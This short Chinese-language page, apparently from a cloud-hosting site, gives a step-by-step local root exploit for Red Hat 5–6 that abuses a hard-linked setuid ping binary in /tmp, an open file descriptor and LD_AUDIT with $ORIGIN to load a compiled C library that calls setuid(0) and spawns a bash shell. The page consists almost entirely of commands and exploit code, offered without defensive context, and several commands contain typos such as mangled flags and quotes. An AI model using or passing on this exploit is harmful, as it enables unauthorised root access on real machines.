溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
漏洞試用系統:redhat 5—6通用
一.利用/tmp擁有777的權限
在/tmp下創建一個exploit目錄
ln /bin/ping(ping命令的權限很特殊是S,可以在普通用戶使用這個命令的時候瞬間擁有這個命令的屬主權限,這里是root)
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
二.vim編寫一段C語言程序(文件名payload.c)
void __attribute__((constructor)) init() //這里__是兩個下劃線
{
setuid(0);
system(“/bin/bash”);
}
使用GCC把這個文件編譯一下
Gcc -w –fpic –shared –o /tmp/exploit payload.c
三.執行
LD_AUDIT=”\$ORIGIN” exec/proc/self/fd/3
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
